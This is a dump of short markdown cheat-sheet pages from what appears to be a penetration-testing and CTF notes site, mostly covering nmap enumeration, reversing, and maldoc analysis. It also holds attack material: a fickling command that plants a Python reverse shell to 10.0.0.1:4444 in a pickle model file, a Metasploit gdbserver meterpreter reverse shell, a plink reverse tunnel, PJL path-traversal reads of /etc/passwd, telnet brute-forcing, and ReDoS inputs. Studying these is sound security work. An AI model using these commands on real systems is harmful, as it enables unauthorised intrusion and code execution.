description: Dimensionality reduction is a data-processing technique that makes machine learning models easier to train. 4 | tags: 5 | - Data Processing 6 | - Machine Learning 7 | refs: 8 | - https://www.kaggle.com/competitions/ai-village-ctf 9 | date: 2023-08-20 10 | draft: false 11 | --- 12 | 13 | ## PCA (Principal Component Analysis) 14 | 15 | Reference: [https://www.kaggle.com/code/jonbown/ai-ctf-submissions?scriptVersionId=105606691&cellId=42](https://www.kaggle.com/code/jonbown/ai-ctf-submissions?scriptVersionId=105606691&cellId=42) 16 | 17 | We use **PCA** to find the optimal number of dimensions for the data. 18 | 19 | ```python 20 | import numpy as np 21 | from sklearn.decomposition import PCA 22 | 23 | data = np.load("example.npy") 24 | 25 | for i in range(1, 10): 26 | pca = PCA(n_components=i) 27 | principal_components = pca.fit_transform(data) 28 | print(pca.explained_variance_ratio_) 29 | ``` 30 | -------------------------------------------------------------------------------- /src/exploit/machine-learning/llm/_data.yml: -------------------------------------------------------------------------------- 1 | category2: llm -------------------------------------------------------------------------------- /src/exploit/machine-learning/model/_data.yml: -------------------------------------------------------------------------------- 1 | category2: model -------------------------------------------------------------------------------- /src/exploit/machine-learning/model/pickle-code-injection.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Pickle Code Injection 3 | description: 4 | tags: 5 | - Machine Learning 6 | refs: 7 | - https://github.com/trailofbits/fickling 8 | - https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/ 9 | - https://thehackernews.com/2024/06/new-attack-technique-sleepy-pickle.html 10 | date: 2024-07-17 11 | draft: false 12 | --- 13 | 14 | ## Exploit 15 | 16 | ```bash 17 | 
fickling --inject "import os; os.system('/bin/bash')" example.pkl 18 | 19 | # Reverse shell (replace "10.0.0.1" and 4444 with your own) 20 | fickling --inject 'import socket,os,pty;s=socket.socket();s.connect(("10.0.0.1",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")' example.pkl 21 | ``` 22 | -------------------------------------------------------------------------------- /src/exploit/machine-learning/orange-data-mining.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Orange Data Mining 3 | description: Orange is a data-mining and machine learning software that allows users to analyze data, create visualizations, and build predictive models. 4 | tags: 5 | - Machine Learning 6 | refs: 7 | - https://orange3.readthedocs.io/projects/orange-visual-programming/en/latest/index.html 8 | date: 2023-03-20 9 | draft: false 10 | --- 11 | 12 | ## Installation & Start 13 | 14 | To install Orange, we can install it with pip in Linux. 15 | 16 | ```bash 17 | pip install PyQt5 PyQtWebEngine 18 | pip install orange3 19 | ``` 20 | 21 |
22 | 23 | ## Basic Usage 24 | 25 | ### 1. Start Orange Software 26 | 27 | ```bash 28 | python -m Orange.canvas 29 | ``` 30 | 31 | ### 2. Open .OWS File 32 | 33 | When Orange starts, open the “.ows” file. 34 | 35 | ### 3. Import Data File 36 | 37 | Add the File widget from the left pane, and import a data file such as a “.csv”. 38 | 39 | ### 4. Workflows 40 | 41 | Connect the File widget to the Scatter Plot widget and open the Scatter Plot. We can see the data as a plot. -------------------------------------------------------------------------------- /src/exploit/machine-learning/read-pt.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Read PT File 3 | description: A PT file is a machine learning model file generated by PyTorch. 4 | tags: 5 | - Machine Learning 6 | refs: 7 | date: 2023-03-26 8 | draft: false 9 | --- 10 | 11 | ## Load Model from PT 12 | Note that `torch.load` unpickles the file, so loading a `.pt` file from an untrusted source can execute arbitrary code; load only trusted files, or pass `weights_only=True` to restrict what is unpickled. 13 | ```python 14 | import torch 15 | import torch.nn as nn 16 | 17 | class ExampleModel(nn.Module): 18 | def __init__(self): 19 | super().__init__() 20 | self.flatten = nn.Flatten() 21 | self.linear_relu_stack = nn.Sequential( 22 | nn.Linear(28*28, 512), 23 | nn.ReLU(), 24 | nn.Linear(512, 10)) 25 | 26 | def forward(self, x): 27 | x = self.flatten(x) 28 | logits = self.linear_relu_stack(x) 29 | return logits 30 | 31 | model = ExampleModel() 32 | model.load_state_dict(torch.load('example.pt')) 33 | print(model) 34 | ``` -------------------------------------------------------------------------------- /src/exploit/malware/_data.yml: -------------------------------------------------------------------------------- 1 | category1: malware 2 | related_menus: 3 | - title: Others 4 | id: others -------------------------------------------------------------------------------- /src/exploit/malware/maldoc-analysis.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Maldoc Analysis 3 | description: Malicious Documents (.doc) 
are Microsoft documents that contain malicious executable code. 4 | tags: 5 | - Malware 6 | refs: 7 | date: 2023-08-06 8 | draft: false 9 | --- 10 | 11 | ## Static Analysis 12 | 13 | ### Extract Files in Doc 14 | 15 | ```bash 16 | unzip example.doc 17 | ``` 18 | 19 | ### Find Interesting Information 20 | 21 | ```bash 22 | strings example.doc 23 | exiftool example.doc 24 | binwalk -e example.doc 25 | ``` 26 | 27 | Additionally, we can use CyberChef. Follow these steps: 28 | 29 | 1. Open **CyberChef** 30 | 2. Upload the suspicious doc file to CyberChef. 31 | 3. Use the **"Strings"** function to extract strings. 32 | 4. If you find obfuscated strings in the results, add the **"Find / Replace"** function to remove extra strings. 33 | 5. If necessary, add the **"Drop bytes"** function to remove extra bytes. 34 | 35 | ### Dump Macros 36 | 37 | If you don’t have `oletools`, install it first. 38 | 39 | ```bash 40 | # Install `oletools` module 41 | python -m venv venv 42 | source venv/bin/activate 43 | pip install oletools 44 | ``` 45 | 46 | To dump macros, run the following command. 47 | 48 | ```bash 49 | olevba -c example.doc 50 | ``` 51 | -------------------------------------------------------------------------------- /src/exploit/malware/npm-supply-chain-attack.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: NPM Supply Chain Attack 3 | description: An attacker might be able to lead an organization to install a malicious NPM package by abusing misconfiguration of the internal proxy server or package manager. 4 | tags: 5 | - Malware 6 | - Supply Chain 7 | refs: 8 | - https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610 9 | - https://snyk.io/blog/npm-security-preventing-supply-chain-attacks/ 10 | date: 2023-07-12 11 | draft: false 12 | --- 13 | 14 | This page is still incomplete. 
15 | 16 | ## Dependency Confusion 17 | 18 | The [PoC](https://github.com/x1337loser/Dependency-Confusion) is available thanks to the researcher who discovered the threat. 19 | 20 |
21 | 22 | ## Lock File Injection 23 | 24 | Attackers may insert their malicious npm package into **`yarn.lock`** or **`package-lock.json`** in the target project. -------------------------------------------------------------------------------- /src/exploit/memory/_data.yml: -------------------------------------------------------------------------------- 1 | category1: memory 2 | related_menus: 3 | - title: Others 4 | id: others -------------------------------------------------------------------------------- /src/exploit/mobile/_data.yml: -------------------------------------------------------------------------------- 1 | category1: mobile 2 | related_menus: 3 | - title: Android 4 | id: android -------------------------------------------------------------------------------- /src/exploit/mobile/android/_data.yml: -------------------------------------------------------------------------------- 1 | category2: android -------------------------------------------------------------------------------- /src/exploit/network/_data.yml: -------------------------------------------------------------------------------- 1 | category1: network 2 | related_menus: 3 | - title: Protocol 4 | id: protocol 5 | - title: Port Forwarding 6 | id: port-forwarding 7 | - title: WiFi 8 | id: wifi 9 | - title: Attack 10 | id: attack 11 | - title: Tool 12 | id: tool 13 | - title: VPN 14 | id: vpn 15 | - title: Others 16 | id: others -------------------------------------------------------------------------------- /src/exploit/network/arp-spoofing.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: ARP (Address Resolution Protocol) Spoofing 3 | description: ARP is used to find another computer’s MAC address based on its IP address. 4 | tags: 5 | - Network 6 | refs: 7 | date: 2022-11-22 8 | draft: false 9 | --- 10 | 11 | ## Basic Flow 12 | 13 | 1. 
**Check Interface and Gateway IP Address** 14 | 15 | ```sh 16 | # Interfaces 17 | ip addr 18 | 19 | # Default gateway 20 | ip route list 21 | ``` 22 | 23 | 2. **Scan the Network to Find Target IP** 24 | 25 | ```sh 26 | nmap -sP /24 27 | nmap -sP /16 28 | ``` 29 | 30 | 3. **Enable IP Forwarding** 31 | 32 | ```sh 33 | # Allow all forwarding in the LAN 34 | # -A: append rules 35 | # -i: interface 36 | # -j: jump 37 | iptables -A FORWARD -i eth0 -j ACCEPT 38 | ``` 39 | 40 |
41 | 42 | ## Find MAC Address 43 | 44 | ```sh 45 | cat /sys/class/net/eth0/address 46 | cat /sys/class/net/enp0s3/address 47 | cat /sys/class/net/tun0/address 48 | ``` -------------------------------------------------------------------------------- /src/exploit/network/attack/_data.yml: -------------------------------------------------------------------------------- 1 | category2: attack -------------------------------------------------------------------------------- /src/exploit/network/eternetip-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: EthernetIP Pentesting 3 | description: EtherNet/IP is an industrial network protocol that adapts the Common Industrial Protocol to standard Ethernet. A default port is 44818. 4 | tags: 5 | - Network 6 | refs: 7 | date: 2023-01-27 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ```bash 14 | nmap --script enip-info -p 44818 15 | ``` -------------------------------------------------------------------------------- /src/exploit/network/firewall.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Firewall 3 | description: A firewall is a network security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules. 4 | tags: 5 | - Network 6 | refs: 7 | date: 2022-12-11 8 | draft: false 9 | --- 10 | 11 | ## Status 12 | 13 | ```sh 14 | ufw status 15 | ufw status verbose 16 | ``` 17 | 18 |
19 | 20 | ## Enable/Disable the Firewall 21 | 22 | ```sh 23 | ufw enable 24 | 25 | ufw disable 26 | ``` 27 | 28 |
29 | 30 | ## Set Default Policies 31 | 32 | ```sh 33 | # Allow all 34 | ufw default ALLOW 35 | 36 | # Deny all 37 | ufw default DENY 38 | ``` 39 | 40 |
41 | 42 | ## Rules 43 | 44 | - **Allow** 45 | 46 | ```sh 47 | ufw allow 22 48 | ufw allow 22/tcp 49 | ufw allow 80 50 | ufw allow 80/tcp 51 | 52 | # Allow the given ip address access to port 22 for all protocols 53 | ufw allow from to any port 22 54 | ``` 55 | 56 | - **Deny** 57 | 58 | ```sh 59 | ufw deny 22 60 | ufw deny 22/tcp 61 | ufw deny 80 62 | ufw deny 80/tcp 63 | ``` -------------------------------------------------------------------------------- /src/exploit/network/grpc-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: gRPC Pentesting 3 | description: gRPC is a cross-platform open source high performance remote procedure call framework. Default ports are 80, 443 and the official docs example use 50051 port. 4 | tags: 5 | - Network 6 | refs: 7 | date: 2023-05-28 8 | draft: false 9 | --- 10 | 11 | ## Connect with [grpcui](https://github.com/fullstorydev/grpcui) 12 | 13 | **`grpcui`** is an interactive web UI for **gRPC**. 14 | If you don’t have `grpcui`, you need to install it. 15 | 16 | ```bash 17 | go install github.com/fullstorydev/grpcui/cmd/grpcui@latest 18 | ``` 19 | 20 | Then we can interact with gRPC. 21 | 22 | ```bash 23 | grpcui -plaintext example.com:9019 24 | ``` -------------------------------------------------------------------------------- /src/exploit/network/port-forwarding/_data.yml: -------------------------------------------------------------------------------- 1 | category2: port-forwarding -------------------------------------------------------------------------------- /src/exploit/network/port-forwarding/port-forwarding-with-plink.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Port Forwarding with Plink 3 | description: Plink is a Windows command line version of the PuTTY SSH client. 4 | tags: 5 | - Network 6 | refs: 7 | date: 2023-03-19 8 | draft: false 9 | --- 10 | 11 | ## Reverse Connection 12 | 13 | ### 1. 
Open Listener on Your Local Machine 14 | 15 | ```sh 16 | nc -lvnp 4444 17 | ``` 18 | 19 | ### 2. Run Reverse Connection on Target Machine 20 | 21 | First, generate an SSH key pair. Two keys (public and private) will be generated. 22 | 23 | ```sh 24 | ssh-keygen 25 | ``` 26 | 27 | Convert the private key for Windows. 28 | 29 | ```sh 30 | puttygen private_key -o private_key.ppk 31 | ``` 32 | 33 | Run the reverse connection using plink. 34 | 35 | ```powershell 36 | cmd.exe /c echo y | .\plink.exe -R :: attacker@ -i private_key.ppk -N 37 | ``` 38 | -------------------------------------------------------------------------------- /src/exploit/network/protocol/_data.yml: -------------------------------------------------------------------------------- 1 | category2: protocol -------------------------------------------------------------------------------- /src/exploit/network/protocol/dhcp-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: DHCP (Dynamic Host Configuration Protocol) Pentesting 3 | description: DHCP uses UDP. Port 67 is for a server, port 68 is for a client. 4 | tags: 5 | - Network 6 | refs: 7 | date: 2022-12-10 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ```sh 14 | nmap -sU --script broadcast-dhcp-discover -p 67,68 15 | ``` 16 | -------------------------------------------------------------------------------- /src/exploit/network/protocol/irc-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: IRC (Internet Relay Chat) Pentesting 3 | description: IRC is a protocol that allows text-based communication between multiple parties. Default ports are 194 and 6667. 
4 | tags: 5 | - Network 6 | refs: 7 | date: 2023-02-26 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ```bash 14 | nmap --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194 15 | ``` 16 | -------------------------------------------------------------------------------- /src/exploit/network/protocol/memcache-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Memcache Pentesting 3 | description: Memcached is a general-purpose distributed memory caching system. A default port is 11211. 4 | tags: 5 | - Web 6 | refs: 7 | - https://book.hacktricks.xyz/network-services-pentesting/11211-memcache 8 | date: 2023-02-23 9 | draft: false 10 | --- 11 | 12 | ## Communication 13 | 14 | We can communicate with memcache server using Netcat. 15 | 16 | ```bash 17 | nc -vn 11211 18 | Connection to 11211 port [tcp/*] succeeded! 19 | 20 | # Commands in nc 21 | version 22 | stats 23 | stats slabs 24 | stats items 25 | stats cachedump 0 26 | stats cachedump 1 0 27 | get 28 | ``` -------------------------------------------------------------------------------- /src/exploit/network/protocol/modbus-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Modbus Pentesting 3 | description: Modbus is a data communications protocol. A default port is 502. 
4 | tags: 5 | - Network 6 | refs: 7 | date: 2023-01-06 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ```bash 14 | nmap --script modbus-discover --script-args modbus-discover.aggressive=true -p 502 15 | ``` 16 | -------------------------------------------------------------------------------- /src/exploit/network/protocol/ntp-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: NTP (Network Time Protocol) Pentesting 3 | description: NTP is a networking protocol for clock synchronization between computer systems over packet-switched. Default port is 123. It uses UDP. 4 | tags: 5 | - Network 6 | refs: 7 | date: 2022-12-01 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ```sh 14 | nmap -sU --script ntp-info -p 123 15 | nmap -sU --script ntp-monlist -p 123 16 | nmap -sU --script ntp* -p 123 17 | nmap -sU --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 18 | ``` 19 | 20 | ### Ntpq 21 | 22 | ```sh 23 | ntpq -c readlist 24 | ntpq -c readvar 25 | ntpq -c peers 26 | ntpq -c associations 27 | ntpdc -c monlist 28 | ntpdc -c listpeers 29 | ntpdc -c sysinfo 30 | ``` 31 | -------------------------------------------------------------------------------- /src/exploit/network/protocol/pptp-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: PPTP Pentesting 3 | description: PPTP is one of the first VPN protocols. It relies on the MPPE (Microsoft Point-to-Point Encryption) protocol. A default port is 1723. 
4 | tags: 5 | - SSH 6 | refs: 7 | - https://www.linkedin.com/pulse/common-vpn-vulnerabilities-exploits-abed-a-a- 8 | date: 2023-10-05 9 | draft: false 10 | --- 11 | 12 | ## Enumeration 13 | 14 | ```bash 15 | nmap --script pptp-version -p 1723 16 | ``` 17 | -------------------------------------------------------------------------------- /src/exploit/network/protocol/telnet-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Telnet Pentesting 3 | description: Telnet is an application protocol used on the internet or local area network. A default port is 23. 4 | tags: 5 | - Network 6 | - Telnet 7 | refs: 8 | date: 2023-10-30 9 | draft: false 10 | --- 11 | 12 | ## Enumeration 13 | 14 | ```sh 15 | nmap --script telnet-encryption -p 23 16 | nmap --script telnet-ntlm-info -p 23 17 | nmap --script telnet-brute --script-args userdb=users.txt,passdb=passwords.txt,telnet-brute.timeout=8s -p 23 18 | ``` 19 | 20 |
21 | 22 | ## Configuration Files 23 | 24 | ```bash 25 | cat /etc/inetd.conf 26 | # or 27 | cat /etc/xinetd.d/telnet 28 | ``` 29 | 30 |
31 | 32 | ## Connect 33 | 34 | ```sh 35 | telnet 36 | telnet 23 37 | ``` 38 | -------------------------------------------------------------------------------- /src/exploit/network/protocol/tftp-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: TFTP (Trivial File Transfer Protocol) Pentesting 3 | description: TFTP is a simple lockstep file transfer protocol which allows a client to get a file from or put a file onto a remote host. It uses UDP. A default port is 69. 4 | tags: 5 | - Network 6 | refs: 7 | date: 2023-10-30 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ```sh 14 | nmap -sU --script tftp-enum -p 69 15 | ``` 16 | 17 |
18 | 19 | ## Configuration Files 20 | 21 | ```bash 22 | cat /etc/inetd.conf 23 | # or 24 | cat /etc/xinetd.d/tftp 25 | ``` -------------------------------------------------------------------------------- /src/exploit/network/protocol/upnp-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: UPnP (Universal Plug and Play) Pentesting 3 | description: UPnP is a network protocol that allows devices to discover and interact with each other seamlessly over a local network. Default ports are 1900 (UDP) and 5000 (TCP). 4 | tags: 5 | - Network 6 | refs: 7 | date: 2023-02-25 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ```bash 14 | nmap -sU --script upnp-info -p 1900 15 | nmap --script upnp-info -p 5000 16 | nmap --script broadcast-upnp-info -p 1900 17 | ``` -------------------------------------------------------------------------------- /src/exploit/network/protocol/waste-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: WASTE Pentesting 3 | description: WASTE is a peer-to-peer and end-to-end protocol and software application. The ports often used are 1337 and 31337. 4 | tags: 5 | - Network 6 | refs: 7 | dates: 2022-12-01 8 | draft: false 9 | --- 10 | 11 | ## Connect 12 | 13 | ```sh 14 | connect 1337 15 | # or 16 | nc 1337 17 | ``` -------------------------------------------------------------------------------- /src/exploit/network/redos.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: ReDoS (Regular Expression Denial of Service) 3 | description: ReDoS is an attack method that exploits vulnerable regular expressions (regexes) which evaluate arbitrary inputs. 
4 | tags: 5 | - Network 6 | refs: 7 | - https://en.wikipedia.org/wiki/ReDoS#Examples 8 | - https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS 9 | date: 2023-10-12 10 | draft: false 11 | --- 12 | 13 | ## Evil (Vulnerable) Regex 14 | 15 | ```html 16 | (a+)+ 17 | ([a-zA-Z]+)* 18 | (a|aa)+ 19 | (a|a?)+ 20 | (.*a){x} for x \> 10 21 | ^(([a-z])+.)+[A-Z]([a-z])+$ 22 | 23 | 24 | /^([a-zA-Z0-9])(([\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$/ 25 | ``` 26 | 27 |
28 | 29 | ## Malicious Input 30 | 31 | If a target website validates user input with the above vulnerable Regex, we may be able to compromise the target system by the following malicious input: 32 | 33 | ```bash 34 | aaaaaaaaaaaaaaaaaaaaaaaa! 35 | ``` 36 | -------------------------------------------------------------------------------- /src/exploit/network/tool/_data.yml: -------------------------------------------------------------------------------- 1 | category2: tool -------------------------------------------------------------------------------- /src/exploit/network/tool/decrypt-putty-sessions-files.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Decrypt SolarPuTTY Sessions Files 3 | description: 4 | tags: 5 | - Network 6 | refs: 7 | date: 2024-12-06 8 | draft: false 9 | --- 10 | 11 | ## Decrypt 12 | 13 | Python code is here: [xHacka's SolarPuttyDecrypt.py](https://gist.github.com/xHacka/052e4b09d893398b04bf8aff5872d0d5) 14 | 15 | ```sh 16 | python3 SolarPuTTYDecrypt.py sessions.dat wordlist.txt 17 | ``` -------------------------------------------------------------------------------- /src/exploit/network/vpn/_data.yml: -------------------------------------------------------------------------------- 1 | category2: vpn -------------------------------------------------------------------------------- /src/exploit/network/vpn/ipsec-vpn-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: IPsec VPN Pentesting 3 | description: IPsec (Internet Protocol Security) is a secure network protocol suite that authenticates and encrypts packets of data to provide secure encrypted communication between two computers over an Internet Protocol network. It is used in VPN (Virtual Private Network). Default ports are 443 (SSL), 500 (IPSec). 
4 | tags: 5 | - VPN 6 | refs: 7 | date: 2022-12-26 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ```sh 14 | nmap --script http-cisco-anyconnect -p 443 15 | nmap --script ike-version -p 500 16 | ``` -------------------------------------------------------------------------------- /src/exploit/network/wifi/_data.yml: -------------------------------------------------------------------------------- 1 | category2: wifi -------------------------------------------------------------------------------- /src/exploit/network/wifi/wifi-password-recovery.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: WiFi Password Recovery 3 | description: If we forget WiFi password, we may be able to recover password from the history. 4 | tags: 5 | - Network 6 | refs: 7 | date: 2023-07-15 8 | draft: false 9 | --- 10 | 11 | ## Windows 12 | 13 | Open Command Prompt as Administrator and then execute the following commands: 14 | 15 | ```sh 16 | # Show all network names you've accessed and saved 17 | netsh wlan show profile 18 | 19 | # Show the details of the specific network including password 20 | netsh wlan show profile name="network-name" key=clear 21 | ``` 22 | 23 |
23 | 24 | ## Linux 25 | 26 | ```sh 27 | ls -al /etc/NetworkManager/system-connections/ 28 | cat /etc/NetworkManager/system-connections/example.nmconnection 29 | ``` 30 | -------------------------------------------------------------------------------- /src/exploit/printer/_data.yml: -------------------------------------------------------------------------------- 1 | category1: printer 2 | related_menus: 3 | - title: Others 4 | id: others -------------------------------------------------------------------------------- /src/exploit/printer/raw-printing-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Raw Printing Pentesting 3 | description: PJL (Printer Job Language) is a method for switching printer languages. A default port is 9100. 4 | tags: 5 | - Printer 6 | refs: 7 | - https://developers.hp.com/system/files/PJL_Technical_Reference_Manual.pdf 8 | - https://book.hacktricks.xyz/network-services-pentesting/9100-pjl 9 | date: 2023-07-19 10 | draft: false 11 | --- 12 | 13 | ## Enumeration 14 | 15 | ```sh 16 | nmap --script pjl-ready-message -p 9100 17 | ``` 18 | 19 |
20 | 21 | ## Connect 22 | 23 | ```bash 24 | nc 9100 25 | ``` 26 | 27 |
28 | 29 | ## Commands 30 | 31 | ```bash 32 | # See printer information 33 | @PJL INFO STATUS 34 | @PJL INFO ID 35 | @PJL INFO PRODINFO 36 | 37 | # See directories in the system 38 | @PJL FSDIRLIST NAME="0:" ENTRY=1 39 | @PJL FSDIRLIST NAME="0:/../" ENTRY=1 40 | @PJL FSDIRLIST NAME="0:/../etc/" ENTRY=1 41 | @PJL FSDIRLIST NAME="0:/../home/" ENTRY=1 42 | 43 | # See contents of a file 44 | @PJL FSUPLOAD NAME="0:/../etc/passwd" ENTRY=1 45 | ``` -------------------------------------------------------------------------------- /src/exploit/privacy/_data.yml: -------------------------------------------------------------------------------- 1 | category1: tor 2 | related_menus: 3 | - title: Tor 4 | id: tor -------------------------------------------------------------------------------- /src/exploit/privacy/tor/_data.yml: -------------------------------------------------------------------------------- 1 | category2: tor -------------------------------------------------------------------------------- /src/exploit/quantum/_data.yml: -------------------------------------------------------------------------------- 1 | category1: quantum 2 | related_menus: 3 | - title: Others 4 | id: others -------------------------------------------------------------------------------- /src/exploit/quantum/read-qasm.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Read QASM 3 | description: QASM (Quantum Assembly Language) is a language used to program quantum computers. It is similar in concept to assembly language used in classical computers, but instead of operating on bits, QASM operates on quantum bits (qubits). 4 | tags: 5 | - Quantum 6 | refs: 7 | - https://github.com/Taoudi/Cyber_Apocalypse/blob/main/HTB.ipynb 8 | date: 2023-03-26 9 | draft: false 10 | --- 11 | 12 | ## Install Qiskit 13 | 14 | ```python 15 | pip install oqi qiskit 16 | ``` 17 | 18 |
19 | 20 | ## Read QASM 21 | 22 | ```python 23 | from qiskit import QuantumCircuit, transpile 24 | from qiskit.providers.aer import QasmSimulator 25 | from qiskit.visualization import plot_histogram 26 | 27 | simulator = QasmSimulator() 28 | circuit = QuantumCircuit.from_qasm_file('example.qasm') 29 | compiled_circuit = transpile(circuit, simulator) 30 | job = simulator.run(compiled_circuit, shots=1000) 31 | result = job.result() 32 | 33 | counts = result.get_counts(compiled_circuit) 34 | print(counts) 35 | ``` -------------------------------------------------------------------------------- /src/exploit/reconnaissance/_data.yml: -------------------------------------------------------------------------------- 1 | category1: reconnaissance 2 | related_menus: 3 | - title: OSINT 4 | id: osint 5 | - title: Search Technique 6 | id: search-technique 7 | - title: Network 8 | id: network 9 | - title: Subdomain 10 | id: subdomain 11 | - title: Others 12 | id: others -------------------------------------------------------------------------------- /src/exploit/reconnaissance/network/_data.yml: -------------------------------------------------------------------------------- 1 | category2: network -------------------------------------------------------------------------------- /src/exploit/reconnaissance/osint/_data.yml: -------------------------------------------------------------------------------- 1 | category2: osint -------------------------------------------------------------------------------- /src/exploit/reconnaissance/search-technique/_data.yml: -------------------------------------------------------------------------------- 1 | category2: search-technique -------------------------------------------------------------------------------- /src/exploit/reconnaissance/search-technique/shodan-dorks.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Shodan Dorks 3 | description: Shordan is a search engine which allows us to 
find various types of servers by filters. This page gives ways to search specific information. 4 | tags: 5 | - OSINT 6 | - Reconnaissance 7 | refs: 8 | - https://systemweakness.com/how-to-find-open-elasticsearch-databases-using-shodan-fb9314af604a 9 | date: 2023-07-14 10 | draft: false 11 | --- 12 | 13 | ```bash 14 | product:elastic port:9200 country:us 15 | product:postgresql port:5432 country:jp 16 | 17 | # Search 'users' column 18 | proudct:elastic port:9200 users 19 | ``` 20 | -------------------------------------------------------------------------------- /src/exploit/reconnaissance/subdomain/_data.yml: -------------------------------------------------------------------------------- 1 | category2: subdomain -------------------------------------------------------------------------------- /src/exploit/reverse-engineering/_data.yml: -------------------------------------------------------------------------------- 1 | category1: reverse-engineering 2 | related_menus: 3 | - title: Assembly 4 | id: assembly 5 | - title: Cheatsheet 6 | id: cheatsheet 7 | - title: Reversing 8 | id: reversing 9 | - title: Debugger 10 | id: debugger 11 | - title: Others 12 | id: others -------------------------------------------------------------------------------- /src/exploit/reverse-engineering/assembly/_data.yml: -------------------------------------------------------------------------------- 1 | category2: assembly -------------------------------------------------------------------------------- /src/exploit/reverse-engineering/cheatsheet/_data.yml: -------------------------------------------------------------------------------- 1 | category2: cheatsheet -------------------------------------------------------------------------------- /src/exploit/reverse-engineering/debugger/_data.yml: -------------------------------------------------------------------------------- 1 | category2: debugger -------------------------------------------------------------------------------- 
/src/exploit/reverse-engineering/debugger/gdbserver-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: GdbServer Pentesting 3 | description: 4 | tags: 5 | - Reverse Engineering 6 | refs: 7 | date: 2024-07-17 8 | draft: false 9 | --- 10 | 11 | ## Reverse Shell with Metasploit 12 | 13 | ```bash 14 | msfconsole 15 | msf> use exploit/multi/gdb/gdb_server_exec 16 | msf> set payload linux/x64/meterpreter/reverse_tcp 17 | msf> set rhost 18 | msf> set rport 19 | msf> set lhost 20 | msf> set lport 21 | msf> run 22 | ``` 23 | -------------------------------------------------------------------------------- /src/exploit/reverse-engineering/reversing/_data.yml: -------------------------------------------------------------------------------- 1 | category2: reversing -------------------------------------------------------------------------------- /src/exploit/reverse-engineering/reversing/reversing-elf.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Reversing ELF (Executable and Linking Format) 3 | description: ELF is a file format for executables of Linux. 4 | tags: 5 | - Reverse Engineering 6 | refs: 7 | date: 2024-02-18 8 | draft: false 9 | --- 10 | 11 | ## Static Analysis 12 | 13 | ```sh 14 | # -a: All 15 | readelf ./sample -a 16 | # -p: Dump the contents of section 17 | readelf ./sample -p .data 18 | readelf ./sample -p .text 19 | readelf ./sample -p .interp 20 | 21 | # Change MSB <=> LSB by editing binary number. 22 | hexedit ./sample 23 | (MSB) 7F 45 4C 46 02 02 01 ... <=> (LSB) 7F 45 4C 46 02 01 01 ... 
24 | 25 | # Display shared object dependencies 26 | ldd ./sample 27 | ``` 28 | 29 | -------------------------------------------------------------------------------- /src/exploit/reverse-engineering/reversing/reversing-jar.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Reversing JAR File 3 | description: JAR (Java Archive) file can be reversed using some tools. 4 | tags: 5 | - Reverse Engineering 6 | refs: 7 | date: 2024-02-18 8 | draft: false 9 | --- 10 | 11 | ## Code Analysis 12 | 13 | We can use **`jdgui`** GUI tool. 14 | 15 | ```sh 16 | jd-gui 17 | ``` 18 | -------------------------------------------------------------------------------- /src/exploit/reverse-engineering/reversing/reversing-ole.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Reversing OLE 3 | description: OLE is a mechanism that allows users to create and edit documents containing items or "objects" created by multiple applications. 4 | tags: 5 | - Reverse Engineering 6 | refs: 7 | date: 2024-02-18 8 | draft: false 9 | --- 10 | 11 | ## Oledump 12 | 13 | It dumps the information of the OLE files. 14 | 15 | ```sh 16 | oledump.py example.doc 17 | 18 | # -s: stream number to analyze 19 | # -d: dump 20 | oledump.py -s 8 -d example.doc 21 | oledump.py -s 9 -d example.doc 22 | ``` 23 | 24 | Then decrypt the output using online tools like CyberChef. 25 | 26 |
